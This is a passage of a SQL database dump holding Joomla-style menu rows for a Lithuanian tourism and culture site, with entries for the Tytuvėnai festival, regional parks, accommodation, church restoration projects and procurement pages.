00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',132,133,0,'*',0),(294,'mainmenu','Galerija','tytuvenu-festivalis','','tytuvenu-festivalis','index.php?option=com_content&view=article&id=206','component',1,1,1,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',333,342,0,'*',0),(295,'mainmenu','Naujienos','naujienos','','tytuvenu-festivalis/naujienos','index.php?option=com_content&view=featured','component',0,294,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"featured_categories\":[\"56\"],\"layout_type\":\"blog\",\"num_leading_articles\":\"0\",\"num_intro_articles\":\"6\",\"num_columns\":\"1\",\"num_links\":\"\",\"multi_column_order\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_title\":\"0\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"0\",\"link_category\":\"0\",\"show_parent_category\":\"0\",\"link_parent_category\":\"0\",\"show_author\":\"0\",\"link_author\":\"0\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_vote\":\"0\",\"show_readmore\":\"\",\"show_readmore_title\":\"0\",\"show_icons\":\"0\",\"show_print_icon\":\"0\",\"show_email_icon\":\"0\",\"show_hits\":\"0\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"730\",\"colxw\":\"230\\r\\n230\\r\\n270\",\"class\":\"\",\"subcontent\":\"normal\"}',334,335,0,'*',0),(311,'mainmenu','Galerija','galerija','','apie-centra/galerija','index.php?option=com_content&view=article&id=206','component',0,259,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',76,77,0,'*',0),(296,'mainmenu','Programos','programos','','tytuvenu-festivalis/programos','index.php?option=com_content&view=article&id=285','component',0,294,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',336,337,0,'*',0),(297,'mainmenu','Galerija','galerija','','tytuvenu-festivalis/galerija','index.php?option=com_content&view=article&id=190','component',0,294,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',338,339,0,'*',0),(298,'mainmenu','Kontaktai','kontaktai','','tytuvenu-festivalis/kontaktai','index.php?option=com_content&view=article&id=191','component',0,294,2,22,0,135,'2023-11-27 16:55:14',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',340,341,0,'*',0),(299,'mainmenu','aaa','aaa','','aaa','index.php?option=com_content&view=category&layout=blog&id=12','component',-2,1,1,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"layout_type\":\"blog\",\"show_category_heading_title_text\":\"\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"page_subheading\":\"\",\"num_leading_articles\":\"0\",\"num_intro_articles\":\"6\",\"num_columns\":\"3\",\"num_links\":\"10\",\"multi_column_order\":\"\",\"show_subcategory_content\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',343,344,0,'*',0),(301,'mainmenu','Aktyvus poilsis','aktyvus-poilsis','','turizmo-informacija/aktyvus-poilsis','index.php?option=com_content&view=article&id=195','component',1,287,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',86,87,0,'*',0),(302,'mainmenu','Kulinarinis paveldas','kulinarinis-paveldas','','turizmo-informacija/kulinarinis-paveldas','index.php?option=com_content&view=article&id=196','component',0,287,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',88,89,0,'*',0),(303,'mainmenu','Gido paslaugos','gido-paslaugos','','turizmo-informacija/gido-paslaugos','index.php?option=com_content&view=article&id=197','component',1,287,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',90,91,0,'*',0),(304,'mainmenu','Suvenyrai','suvenyrai','','turizmo-informacija/suvenyrai','index.php?option=com_content&view=article&id=198','component',1,287,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',92,93,0,'*',0),(305,'mainmenu','Turizmo maršrutai','turizmo-marsrutai','','turizmo-informacija/turizmo-marsrutai','index.php?option=com_content&view=article&id=199','component',1,287,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',94,95,0,'*',0),(306,'mainmenu','Tytuvėnų regioninis parkas','tytuvenu-regioninis-parkas','','turizmo-informacija/tytuvenu-regioninis-parkas','index.php?option=com_content&view=article&id=200','component',1,287,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',96,97,0,'*',0),(307,'mainmenu','Dubysos regioninis parkas','dubysos-regioninis-parkas','','turizmo-informacija/dubysos-regioninis-parkas','index.php?option=com_content&view=article&id=201','component',1,287,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',98,99,0,'*',0),(308,'mainmenu','Kurtuvėnų regioninis parkas','kurtuvenu-regioninis-parkas','','turizmo-informacija/kurtuvenu-regioninis-parkas','index.php?option=com_content&view=article&id=202','component',1,287,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',100,101,0,'*',0),(309,'mainmenu','Varnių regioninis parkas','varniu-regioninis-parkas','','turizmo-informacija/varniu-regioninis-parkas','index.php?option=com_content&view=article&id=203','component',1,287,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',102,103,0,'*',0),(310,'mainmenu','Apgyvendinimas','apgyvendinimas','','apgyvendinimas/apgyvendinimas','index.php?option=com_content&view=article&id=164','component',0,289,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',120,121,0,'*',0),(312,'mainmenu',' I. Bažnyčios restauravimas','i-etapas-baznycios-restauravimas','','projektai/i-etapas-baznycios-restauravimas','index.php?option=com_content&view=article&id=210','component',1,276,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',136,137,0,'*',0),(313,'mainmenu','II. Bažnyčios restauravimas','ii-etapas-baznycios-restauravimas','','projektai/ii-etapas-baznycios-restauravimas','index.php?option=com_content&view=article&id=211','component',1,276,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',138,139,0,'*',0),(314,'mainmenu','Veiklos ataskaitos','veiklos-ataskaitos','','apie-centra/veiklos-ataskaitos','index.php?option=com_content&view=article&id=241','component',1,259,2,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',78,79,0,'*',0),(315,'mainmenu','Mažos vertės už 2015 m.','mazos-vertes-pirkimai-2015-m','','apie-centra/viesieji-pirkimai/mazos-vertes-pirkimai-2015-m','index.php?option=com_content&view=article&id=255','component',0,284,3,22,0,0,'0000-00-00 00:00:00',0,1,'',0,'{\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0,\"showmenutitle\":\"1\",\"desc\":\"\",\"cols\":\"1\",\"group\":\"0\",\"showgrouptitle\":\"1\",\"cwidth\":\"\",\"colxw\":\"\",\"class\":\"\",\"subcontent\":\"normal\"}',69,70,0,'*',0),(316,'mainmenu','Mažos vertės už 2014 m.','mazos-vertes-pirkimai-2014-m','','apie-centra/viesieji-pirkimai/mazos-vertes-pirkimai-2014-m','index.php?option=com_content&view=article&id=254','component',0,284,3,22,0,0,'0000-00-00 